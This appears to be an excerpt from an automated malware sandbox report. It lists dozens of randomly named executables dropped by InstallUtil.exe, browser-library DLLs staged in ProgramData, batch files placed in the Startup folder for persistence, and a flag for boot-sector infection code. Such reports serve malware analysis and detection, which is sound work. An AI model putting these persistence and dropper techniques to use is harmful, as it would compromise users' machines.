                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exeJump to dropped file
                        Source: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exeFile created: C:\Users\user\AppData\Local\Temp\is-AMVCA.tmp\uOoBNdE6Sm5DmPd13osCbhQm.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6ZqpY056kcnYDSL39QayoHTr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ZMwlUWMtiNLOgzHdIp3EVbeM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XexwpboKjyWVbo8FFgPmChDN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\O50rYOnObKacSw7359do7lgN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\51lQApdWbXELTdretyNDFkhG.exeJump to dropped file
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeFile created: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\qtBU2wcdiddM8Ew6K9GV1QbJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\79Szb4ZgprIQoh5kmp3Ht91W.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nacv1V5amvW0txqp8nJ7QSVf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\N9lxfrZyrFBnT9kkfNS8cZTT.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Opera_108.0.5067.24_Autoupdate_x64[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\t6FVjUQyIYOEGsrhSQAlAtYA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libvorbis-0.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\cBFvqvrl6uXFbTB4JYYj3iX2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\HPykbtSofo4ieesmLEyEOoa7.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\OGlsLpt3IrpM6JOWnTsyCqhd.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1IQ1OhLwzIr1htrixbUaD3zt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zpUboT49MR3eAuGylrU8kcsm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gEy33b1wzb5JaeAUext9FbaV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275032111804.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XcjiyfDAp1xg32d0IyIg2zMk.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JRoV34kN30OEKUZzqqQMQIaH.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-L0QM8.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\D2g51ebrTdw2dcv4PFU8OjS1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\pqTEuXs4oMBqF8pyFu5iVhTO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\CTBhrqB7vKJROnvunuZcUFAZ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\wGeagqqn2DOY11i8cqkdcJ6l.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\f1VJcAMWETqBCjZqFoktlvLX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\M6twW38X7sVJZxeigqyEpnb7.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rpBCc3ylG3nivVIH9WHFRiU0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\IfzaP4WqQEdUcGlnXuUZNlcC.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nNmaiuLbBvtjFhtSarVAt2ZV.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\GU2AoS4KXuNbCT975QhkMBWI.exeJump to dropped file
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\v88rIHAQvxZfLboOPn5cTWY9.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\QHmCOGrGcBV6cGjqniLiFdsr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NZM2kE4xFO5iDsk9Rikx4C6y.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ju6O9RRnwY5cmyJE9vtS2Jgt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\VF8FZJ0N2C8kYnK4sTeCIQXo.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\o9mWBH3W8d1Wz63VdcWUPlCt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\UMNq6JQCwcuFbKEJ00C7NaNb.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\H07iGpAOLsi3Xl2Zht1ZcBjf.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\74A4jsUKcYxv4CUlznOidThQ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275393811096.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CYjxBxbX4468KtV9KoBZh2Bv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CjpLjLpVUeATlK006BhaYHDA.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-07B68.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\7j7a6Y5ZdE9mwtxTh84g5rxP.exeJump to dropped file
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exeFile created: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UpuXhVlAiE2lL81UfJ7rqxoG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-NP3DM.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\RjS1Nhdf06REy5J9bfLmGhpU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\G8aAj5L1YhrpqSPmcz12ZEUR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\DMECl6rKVeXO0VOyuijXmPsf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gYoelXOXnR67v6k5aVRTdw5t.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\SSEzfyhdmFgId4wuINTHaAmw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\unins000.exe (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xYgVykjMJXKeoDKuEBWTMXD2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\RHfgbpolIV21eYBHVUExVm7m.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NRQOltVD0acQXnzUvV0AHMDa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\flgUFRxMTOax9vom3NLtvcuv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FIE2EI26EI4jGGv0xJtpXxXh.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oqVEsHQBNrwNPHffhPILiRr1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\rJjlxE1wY4HXoMWnySLKuJe5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\cJP9SLzzak6gFJD9JFpAVvaN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CetLHNUiPRGPPEJBiP5m1V59.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\dvdyeMQ4IU05HT0hXUiampSM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\ZNUkdRLikcOE0I8txHta42nK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\7Ze1sBHT2zACLNmQRZlcE3Tf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\fHmeBOFDBp1fU4tXtZW1SwCU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PuOhjWfV8sy4waUuI70BLeKF.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3m556AQE7tDOPkLnbR8jRGPu.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\vMDfzN6ieihUJhAninw4nHZX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nPlq3xTmye2f3pu3slr0k49k.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\w9kWzhn3BOumuqtEzmPZdJ7I.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\1NKkMLyw9h7c8epRkEFEngCg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\aRNQGQYPdgEPyk2wKE0Y2RBY.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libbz2-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\TE3hLMsyayYuQeWvMvP9Nt4X.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\kMxkjYtyyi8n2ckmtmDaxJ9E.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gd9bLSj4SZDYngCX7Y23gLEe.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bmLLVkqEoc8XwPP6fRiheZRk.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\03oBcB8Rvh6nT71GnuDYAwPv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\K7OlehBeK7vDe9ywIcEpfFfd.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\WHjVEyd48wD2Vps4mOrN0xgt.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libwinpthread-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\i7KTy1Vb7MGYU7JDB8adhZqD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JmSupDwlA9Oqy8L5plKWP6Oj.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027455829404.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zON35BfDXHyPfdPSNEInc2BT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ae4UYt4QuRmNhlRoOAHyWthz.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NqsfoMYypS05t81TJmKPA8xv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112746972.log
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112756158.log
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112813759.log
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112809817.log

                        Boot Survival

                        barindex
                        Contains functionality to infect the boot sector
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive016_2_00401A4F
                        Drops script or batch files to the startup folder
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CizbWvvGUnk05BM6mZJPptaz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2ivxKjIFzltkDEA2JxwPp8hh.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VcZwTQ1Borjv2y0HnBVtpR2m.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rkJ56qyUQvOtS5TAPobyZHxi.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lo2UTsMDlN4zzEXKzfmqog6U.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RqL7mk3tF50auCgY9TJx4Xx5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZs2BdtaVoF2513D2RlX46qg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YM0LEQEFQcy2LayzrWJLzr2X.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqCKxxB7rjibzQ1Dve4DDO9p.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYlPDGvk41C0TPxT1reEBFhp.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v4bWLa58H6i1mhTHOnasQ1vq.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAr643SNguCt1xm73LKTPAoT.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3pPAKGnPRFkr8xt7bRSlRjc.batJump to dropped file
